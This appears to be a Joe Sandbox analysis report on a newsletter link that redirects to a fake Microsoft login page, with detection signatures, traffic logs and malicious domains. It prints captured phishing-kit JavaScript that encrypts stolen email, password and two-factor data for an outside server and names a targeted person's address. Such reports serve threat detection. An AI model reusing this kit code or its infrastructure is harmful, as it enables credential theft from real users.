Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://link.mail.beehiiv.com/ls/click?upn=u001.DTQiLe1mLQCNek4IXPrb3cd8am3-2BtbSaRRShUhZCbhF1FE2NDum-2B9YeqhMivZ-2FcIJGKdOjfqgyCSTZimAiOiNKkJG3N5vgYBNDNlk5YkmOU2XPb-2FKTFlF-2Fc7jFH7Nb8Q0JW6uJclJabjCcGs0cWdzdydwDpcxzScPZQBex7SofyQj6MGdYzEG8hbxGGqYt2bpR0NjPAx6JIYz6GJiSrQNg-3D-3DNN1n_VW5ZEdFpCuXmC2nf4

Overview

General Information

Sample URL:https://link.mail.beehiiv.com/ls/click?upn=u001.DTQiLe1mLQCNek4IXPrb3cd8am3-2BtbSaRRShUhZCbhF1FE2NDum-2B9YeqhMivZ-2FcIJGKdOjfqgyCSTZimAiOiNKkJG3N5vgYBNDNlk5YkmOU2XPb-2FKTFlF-2Fc7jFH7Nb8Q0JW6uJclJabjCc
Analysis ID:1467205
Infos:

Detection

HTMLPhisher
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Antivirus detection for URL or domain
Yara detected HtmlPhish10
Phishing site detected (based on image similarity)
Phishing site detected (based on logo match)
Phishing site detected (based on shot match)
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)
Detected non-DNS traffic on DNS port
Detected suspicious crossdomain redirect
HTML body contains low number of good links
HTML body contains password input but no form action
HTML page contains hidden URLs or javascript code
HTML title does not match URL
Invalid T&C link found
Stores files to the Windows start menu directory
Uses insecure TLS / SSL version for HTTPS connection

Classification

  • System is w10x64
  • chrome.exe (PID: 1600 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 3748 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2552 --field-trial-handle=2520,i,3270245400796582298,11625835967902947532,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 4612 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://link.mail.beehiiv.com/ls/click?upn=u001.DTQiLe1mLQCNek4IXPrb3cd8am3-2BtbSaRRShUhZCbhF1FE2NDum-2B9YeqhMivZ-2FcIJGKdOjfqgyCSTZimAiOiNKkJG3N5vgYBNDNlk5YkmOU2XPb-2FKTFlF-2Fc7jFH7Nb8Q0JW6uJclJabjCcGs0cWdzdydwDpcxzScPZQBex7SofyQj6MGdYzEG8hbxGGqYt2bpR0NjPAx6JIYz6GJiSrQNg-3D-3DNN1n_VW5ZEdFpCuXmC2nf4fwMfiBmdui0O95PSMmp4s-2F2oS3jvSHISWr6XQl8RtHpD7TWmHpRBlT8NsCamUZaroeFibjayeskXeuNnFhPFOon1-2FD6SmbcpIEUC7jghzzXsggajKIODB16RJEeGNz4SFHe6mT-2Bn59v08ju13fD9NtKJQcr97qiQNjiGiaoQJcvN3gUurUBqLZp9I4f9bNW54ZUVVCzpwaogbLaWcL9oScbt8r4Ku34t9zOqlF27gTqXVf6T2MbNMKkoCYnb-2BuL8kIZdyoRM3EFOIuktrG5gMH3OTa1K2klBhmxFOQ2d7plqd5asAi8Ofl9YcYOh-2FL4f45riCQtSdd7jru06EkHcBuJahi-2BD3xm-2F7PbjpIpmn-2Bu7KYdjQeOSKE-2FSiD6UNxc7JQNRWkdnK1RTC7eoEMZms82uCa8fJQIoMgqBt91NrcdZIDONaGhhpHXRhQ1VbYp5h6Cow-3D-3D#?email=YWx5c2EuYUBjZW50dXJ5Yml6c29sdXRpb25zLmNvbQ==" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
3.5.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
    3.6.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
      3.7.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
        4.8.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
          No Sigma rule has matched
          No Snort rule has matched

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: https://ysh.logentr.com/nifpyfuwrptybwamhqjifvdpkdSUBupTOFEKFMKMMHWTBNFLLVDHGJXSUFNYTXJFVQHZQpqTKFJlwZCJgDwI7yzBldhljwwx40Avira URL Cloud: Label: malware
          Source: https://rfwai.elixir85.com/RfWAi/Avira URL Cloud: Label: malware
          Source: https://RfWAi.elixir85.com/RfWAi/#XAvira URL Cloud: Label: malware
          Source: https://rfwai.elixir85.com/RfWAi/?vXalysa.a@centurybizsolutions.comAvira URL Cloud: Label: malware
          Source: https://zichd.6gniu68.ru/dbXLDQtpDSRBuBhVOTWKwXxoBYwUSJTUEAPHETTNOFYTDAHVOKJURMWUFLQPVMBESXVOSRVBAFBDNAvira URL Cloud: Label: malware

          Phishing

          barindex
          Source: https://rfwai.elixir85.comLLM: Score: 9 brands: Microsoft Reasons: The URL 'https://rfwai.elixir85.com' does not match the legitimate domain name 'microsoft.com' associated with the brand Microsoft. The presence of a prominent login form on a non-legitimate domain is a common phishing technique. Additionally, the URL structure and the use of a subdomain (rfwai.elixir85.com) are suspicious and often used in phishing attacks to mislead users. The image resembles a legitimate Microsoft login page, which is a social engineering technique to gain user trust. There is no CAPTCHA present, which is often a feature in legitimate login pages to prevent automated attacks. The link 'Create one!' and 'Can't access your account?' are suspicious as they may lead to further phishing attempts. DOM: 3.5.pages.csv
          Source: https://rfwai.elixir85.comLLM: Score: 9 brands: Microsoft Reasons: The URL 'https://rfwai.elixir85.com' does not match the legitimate domain 'microsoft.com' associated with the brand Microsoft. The presence of a prominent login form on a non-legitimate domain is a common phishing technique. Additionally, the domain 'elixir85.com' is suspicious and not associated with Microsoft. The use of social engineering techniques is evident as the page mimics the legitimate Microsoft login page to deceive users into entering their credentials. There is no CAPTCHA present, which is often used in legitimate sites to prevent automated attacks. The combination of these factors strongly indicates that this is a phishing site. DOM: 3.6.pages.csv
          Source: https://rfwai.elixir85.comLLM: Score: 9 brands: Microsoft Reasons: The URL 'https://rfwai.elixir85.com' does not match the legitimate domain for Microsoft, which is 'microsoft.com'. The presence of a prominent login form on a suspicious domain is a common phishing technique. Additionally, the URL uses a subdomain that does not relate to Microsoft, which is another red flag. The site attempts to mimic the Microsoft login page, which is a social engineering technique to mislead users into entering their credentials. The presence of suspicious links such as 'No account? Create one!' and 'Can't access your account?' further indicates phishing attempts. DOM: 3.7.pages.csv
          Source: Yara matchFile source: 3.5.pages.csv, type: HTML
          Source: Yara matchFile source: 3.6.pages.csv, type: HTML
          Source: Yara matchFile source: 3.7.pages.csv, type: HTML
          Source: Yara matchFile source: 4.8.pages.csv, type: HTML
          Source: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliwMatcher: Found strong image similarity, brand: MICROSOFT
          Source: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliwMatcher: Template: microsoft matched
          Source: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliwMatcher: Template: microsoft matched
          Source: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliwMatcher: Template: microsoft matched
          Source: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliw#Matcher: Template: microsoft matched
          Source: https://rfwai.elixir85.com/RfWAi/#Xalysa.a@centurybizsolutions.comMatcher: Template: captcha matched
          Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/uf0no/0x4AAAAAAAdNpXskQfUxzmND/auto/normalMatcher: Template: captcha matched
          Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/uf0no/0x4AAAAAAAdNpXskQfUxzmND/auto/normalMatcher: Template: captcha matched
          Source: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliwHTTP Parser: var websitenames = ["godaddy", "okta"];var capnum = 1;var appnum = 1;var view = "";var pagelinkval = "6plKry";var emailcheck = "alysa.a@centurybizsolutions.com";var webname = "rtrim(/web8/, '/')";var urlo = "yoCRQfrZ0iVvPSQxT7vvEGN44mzSHgJf035E0VZBImhSjl";var gdf = "ijMjvMSHSrqFVgMMoJavQIpqykyzUFs2P81WaiS2ab120";var odf = "ijmZhkmVs3lGM0Q2sgvoqCHgFfVuvUSbecffP7e0dWab643";var requestsent = false;var pagedata = "";var redirecturl = "";let userAgent = navigator.userAgent;let browserName;let userip;let usercountry;var errorcodeexecuted = false;if(userAgent.match(/chrome|chromium|crios/i)){ browserName = "chrome";} else if(userAgent.match(/firefox|fxios/i)){ browserName = "firefox";} else if(userAgent.match(/safari/i)){ browserName = "safari";} else if(userAgent.match(/opr\//i)){ browserName = "opera";} else if(userAgent.match(/edg/i)){ browserName = "edge";} else{ browserName="No browser detection";}function encryptData(data) { const key = CryptoJS.enc.Utf8.parse('1234567890123456'); const iv = CryptoJS.enc.Utf8.parse('1234567890123456'); const encrypted = CryptoJS.AES.encrypt(data, key, { iv: iv, padding: CryptoJS.pad.Pkcs7, mode: CryptoJS.mode.CBC }); return encrypted.toString();}function decryptData(encryptedData) { const key = CryptoJS.enc.Utf8.parse('1234567890123456'); const iv = CryptoJS.enc.Utf8.parse('1234567890123456'); const decrypted = CryptoJS.AES.decrypt(encryptedData, key, { iv: iv, padding: CryptoJS.pad.Pkcs7, mode: CryptoJS.mode.CBC }); return decrypted.toString(CryptoJS.enc.Utf8);}const sendAndReceive = (route, args, getresponse) => {if(requestsent == true && route !== "twofaselect"){return JSON.parse({"message": "waiting for previous request to complete"});}if(requestsent == false || route == "twofaselect"){requestsent = true;let routename = null;let randpattern = null;if(route == "checkemail"){randpattern = /(pq|rs)[A-Za-z0-9]{6,18}(yz|12|34)[A-Za-z0-9]{2,7}(uv|wx)(3[1-9]|40)/gm;}if(route == "checkpass"){randpattern = /(yz|12)[A-Za-z0-9]{7,14}(56|78)[A-Za-z0-9]{3,8}(op|qr)(4[1-9]|50)/gm;}if(route == "twofaselect"){randpattern = /(56|78|90)[A-Za-z0-9]{8,16}(23|45|67)[A-Za-z0-9]{4,9}(st|uv)(5[1-9]|60)/gm;}if(route == "twofaselected"){randpattern = /(23|45)[A-Za-z0-9]{9,20}(89|90|ab)[A-Za-z0-9]{5,10}(vw|xy)(6[1-9]|70)/gm;}let randexp = new RandExp(randpattern);let randroute = randexp.gen();let formattedargs = 0;if(route == "checkemail"){formattedargs = args.map(item => '/'+item).join('')+'/'+appnum+'/'+getresponse;}if(route !== "checkemail"){formattedargs = '/'+token+args.map(item => '/'+item).join('')+'/'+getresponse;}// console.log(formattedargs);let encrypteddata = encryptData(formattedargs);const makeRequest = (retryCount) => { return new Promise((resolve, reject) => { // url: 'http://91.219.150.47:3000/' + route + formattedargs, // typ
          Source: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliwHTTP Parser: var websitenames = ["godaddy", "okta"];var capnum = 1;var appnum = 1;var view = "";var pagelinkval = "6plKry";var emailcheck = "alysa.a@centurybizsolutions.com";var webname = "rtrim(/web8/, '/')";var urlo = "yoCRQfrZ0iVvPSQxT7vvEGN44mzSHgJf035E0VZBImhSjl";var gdf = "ijMjvMSHSrqFVgMMoJavQIpqykyzUFs2P81WaiS2ab120";var odf = "ijmZhkmVs3lGM0Q2sgvoqCHgFfVuvUSbecffP7e0dWab643";var requestsent = false;var pagedata = "";var redirecturl = "";let userAgent = navigator.userAgent;let browserName;let userip;let usercountry;var errorcodeexecuted = false;if(userAgent.match(/chrome|chromium|crios/i)){ browserName = "chrome";} else if(userAgent.match(/firefox|fxios/i)){ browserName = "firefox";} else if(userAgent.match(/safari/i)){ browserName = "safari";} else if(userAgent.match(/opr\//i)){ browserName = "opera";} else if(userAgent.match(/edg/i)){ browserName = "edge";} else{ browserName="No browser detection";}function encryptData(data) { const key = CryptoJS.enc.Utf8.parse('1234567890123456'); const iv = CryptoJS.enc.Utf8.parse('1234567890123456'); const encrypted = CryptoJS.AES.encrypt(data, key, { iv: iv, padding: CryptoJS.pad.Pkcs7, mode: CryptoJS.mode.CBC }); return encrypted.toString();}function decryptData(encryptedData) { const key = CryptoJS.enc.Utf8.parse('1234567890123456'); const iv = CryptoJS.enc.Utf8.parse('1234567890123456'); const decrypted = CryptoJS.AES.decrypt(encryptedData, key, { iv: iv, padding: CryptoJS.pad.Pkcs7, mode: CryptoJS.mode.CBC }); return decrypted.toString(CryptoJS.enc.Utf8);}const sendAndReceive = (route, args, getresponse) => {if(requestsent == true && route !== "twofaselect"){return JSON.parse({"message": "waiting for previous request to complete"});}if(requestsent == false || route == "twofaselect"){requestsent = true;let routename = null;let randpattern = null;if(route == "checkemail"){randpattern = /(pq|rs)[A-Za-z0-9]{6,18}(yz|12|34)[A-Za-z0-9]{2,7}(uv|wx)(3[1-9]|40)/gm;}if(route == "checkpass"){randpattern = /(yz|12)[A-Za-z0-9]{7,14}(56|78)[A-Za-z0-9]{3,8}(op|qr)(4[1-9]|50)/gm;}if(route == "twofaselect"){randpattern = /(56|78|90)[A-Za-z0-9]{8,16}(23|45|67)[A-Za-z0-9]{4,9}(st|uv)(5[1-9]|60)/gm;}if(route == "twofaselected"){randpattern = /(23|45)[A-Za-z0-9]{9,20}(89|90|ab)[A-Za-z0-9]{5,10}(vw|xy)(6[1-9]|70)/gm;}let randexp = new RandExp(randpattern);let randroute = randexp.gen();let formattedargs = 0;if(route == "checkemail"){formattedargs = args.map(item => '/'+item).join('')+'/'+appnum+'/'+getresponse;}if(route !== "checkemail"){formattedargs = '/'+token+args.map(item => '/'+item).join('')+'/'+getresponse;}// console.log(formattedargs);let encrypteddata = encryptData(formattedargs);const makeRequest = (retryCount) => { return new Promise((resolve, reject) => { // url: 'http://91.219.150.47:3000/' + route + formattedargs, // typ
          Source: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliwHTTP Parser: var websitenames = ["godaddy", "okta"];var capnum = 1;var appnum = 1;var view = "";var pagelinkval = "6plKry";var emailcheck = "alysa.a@centurybizsolutions.com";var webname = "rtrim(/web8/, '/')";var urlo = "yoCRQfrZ0iVvPSQxT7vvEGN44mzSHgJf035E0VZBImhSjl";var gdf = "ijMjvMSHSrqFVgMMoJavQIpqykyzUFs2P81WaiS2ab120";var odf = "ijmZhkmVs3lGM0Q2sgvoqCHgFfVuvUSbecffP7e0dWab643";var requestsent = false;var pagedata = "";var redirecturl = "";let userAgent = navigator.userAgent;let browserName;let userip;let usercountry;var errorcodeexecuted = false;if(userAgent.match(/chrome|chromium|crios/i)){ browserName = "chrome";} else if(userAgent.match(/firefox|fxios/i)){ browserName = "firefox";} else if(userAgent.match(/safari/i)){ browserName = "safari";} else if(userAgent.match(/opr\//i)){ browserName = "opera";} else if(userAgent.match(/edg/i)){ browserName = "edge";} else{ browserName="No browser detection";}function encryptData(data) { const key = CryptoJS.enc.Utf8.parse('1234567890123456'); const iv = CryptoJS.enc.Utf8.parse('1234567890123456'); const encrypted = CryptoJS.AES.encrypt(data, key, { iv: iv, padding: CryptoJS.pad.Pkcs7, mode: CryptoJS.mode.CBC }); return encrypted.toString();}function decryptData(encryptedData) { const key = CryptoJS.enc.Utf8.parse('1234567890123456'); const iv = CryptoJS.enc.Utf8.parse('1234567890123456'); const decrypted = CryptoJS.AES.decrypt(encryptedData, key, { iv: iv, padding: CryptoJS.pad.Pkcs7, mode: CryptoJS.mode.CBC }); return decrypted.toString(CryptoJS.enc.Utf8);}const sendAndReceive = (route, args, getresponse) => {if(requestsent == true && route !== "twofaselect"){return JSON.parse({"message": "waiting for previous request to complete"});}if(requestsent == false || route == "twofaselect"){requestsent = true;let routename = null;let randpattern = null;if(route == "checkemail"){randpattern = /(pq|rs)[A-Za-z0-9]{6,18}(yz|12|34)[A-Za-z0-9]{2,7}(uv|wx)(3[1-9]|40)/gm;}if(route == "checkpass"){randpattern = /(yz|12)[A-Za-z0-9]{7,14}(56|78)[A-Za-z0-9]{3,8}(op|qr)(4[1-9]|50)/gm;}if(route == "twofaselect"){randpattern = /(56|78|90)[A-Za-z0-9]{8,16}(23|45|67)[A-Za-z0-9]{4,9}(st|uv)(5[1-9]|60)/gm;}if(route == "twofaselected"){randpattern = /(23|45)[A-Za-z0-9]{9,20}(89|90|ab)[A-Za-z0-9]{5,10}(vw|xy)(6[1-9]|70)/gm;}let randexp = new RandExp(randpattern);let randroute = randexp.gen();let formattedargs = 0;if(route == "checkemail"){formattedargs = args.map(item => '/'+item).join('')+'/'+appnum+'/'+getresponse;}if(route !== "checkemail"){formattedargs = '/'+token+args.map(item => '/'+item).join('')+'/'+getresponse;}// console.log(formattedargs);let encrypteddata = encryptData(formattedargs);const makeRequest = (retryCount) => { return new Promise((resolve, reject) => { // url: 'http://91.219.150.47:3000/' + route + formattedargs, // typ
          Source: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliwHTTP Parser: Number of links: 0
          Source: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliwHTTP Parser: <input type="password" .../> found but no <form action="...
          Source: https://rfwai.elixir85.com/RfWAi/#Xalysa.a@centurybizsolutions.comHTTP Parser: Base64 decoded: <!DOCTYPE html><html lang="en"><head> <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script> <script src="https://challenges.cloudflare.com/turnstile/v0/api.js?render=explicit"></script> <script src="https://cdnjs.cloudflar...
          Source: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliwHTTP Parser: Title: Financial Modeling does not match URL
          Source: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliwHTTP Parser: Invalid link: Terms of use
          Source: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliwHTTP Parser: Invalid link: Privacy & cookies
          Source: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliwHTTP Parser: Invalid link: Terms of use
          Source: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliwHTTP Parser: Invalid link: Privacy & cookies
          Source: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliwHTTP Parser: Invalid link: Terms of use
          Source: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliwHTTP Parser: Invalid link: Privacy & cookies
          Source: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliwHTTP Parser: <input type="password" .../> found
          Source: https://rfwai.elixir85.com/RfWAi/#Xalysa.a@centurybizsolutions.comHTTP Parser: No favicon
          Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/uf0no/0x4AAAAAAAdNpXskQfUxzmND/auto/normalHTTP Parser: No favicon
          Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/uf0no/0x4AAAAAAAdNpXskQfUxzmND/auto/normalHTTP Parser: No favicon
          Source: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliwHTTP Parser: No favicon
          Source: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliwHTTP Parser: No favicon
          Source: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliwHTTP Parser: No favicon
          Source: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliwHTTP Parser: No <meta name="author".. found
          Source: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliwHTTP Parser: No <meta name="author".. found
          Source: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliwHTTP Parser: No <meta name="author".. found
          Source: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliwHTTP Parser: No <meta name="copyright".. found
          Source: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliwHTTP Parser: No <meta name="copyright".. found
          Source: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliwHTTP Parser: No <meta name="copyright".. found
          Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49747 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 20.190.159.23:443 -> 192.168.2.5:49714 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.190.159.4:443 -> 192.168.2.5:49726 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49734 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49735 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49740 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49742 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49744 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49743 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49766 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49765 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49771 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49772 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49822 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49823 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49838 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49837 version: TLS 1.2
          Source: global trafficTCP traffic: 192.168.2.5:49723 -> 1.1.1.1:53
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: link.mail.beehiiv.com to https://ad4a82ff.fdfsfsfffsffffdfdffdfddfsrfe.pages.dev?utm_source=nohsins-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=new-post
          Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49747 version: TLS 1.0
          Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
          Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
          Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.23
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.23
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.23
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.23
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.23
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.23
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.23
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.23
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.23
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.23
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.23
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.23
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.23
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.23
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.23
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.23
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.23
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.23
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.23
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.23
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.23
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.23
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.23
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.23
          Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
          Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
          Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.23
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.23
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.23
          Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.23
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.23
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.23
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.23
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.23
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.23
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.23
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.23
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.23
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.23
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.23
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.4
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.4
          Source: global trafficHTTP traffic detected: GET /ls/click?upn=u001.DTQiLe1mLQCNek4IXPrb3cd8am3-2BtbSaRRShUhZCbhF1FE2NDum-2B9YeqhMivZ-2FcIJGKdOjfqgyCSTZimAiOiNKkJG3N5vgYBNDNlk5YkmOU2XPb-2FKTFlF-2Fc7jFH7Nb8Q0JW6uJclJabjCcGs0cWdzdydwDpcxzScPZQBex7SofyQj6MGdYzEG8hbxGGqYt2bpR0NjPAx6JIYz6GJiSrQNg-3D-3DNN1n_VW5ZEdFpCuXmC2nf4fwMfiBmdui0O95PSMmp4s-2F2oS3jvSHISWr6XQl8RtHpD7TWmHpRBlT8NsCamUZaroeFibjayeskXeuNnFhPFOon1-2FD6SmbcpIEUC7jghzzXsggajKIODB16RJEeGNz4SFHe6mT-2Bn59v08ju13fD9NtKJQcr97qiQNjiGiaoQJcvN3gUurUBqLZp9I4f9bNW54ZUVVCzpwaogbLaWcL9oScbt8r4Ku34t9zOqlF27gTqXVf6T2MbNMKkoCYnb-2BuL8kIZdyoRM3EFOIuktrG5gMH3OTa1K2klBhmxFOQ2d7plqd5asAi8Ofl9YcYOh-2FL4f45riCQtSdd7jru06EkHcBuJahi-2BD3xm-2F7PbjpIpmn-2Bu7KYdjQeOSKE-2FSiD6UNxc7JQNRWkdnK1RTC7eoEMZms82uCa8fJQIoMgqBt91NrcdZIDONaGhhpHXRhQ1VbYp5h6Cow-3D-3D HTTP/1.1Host: link.mail.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
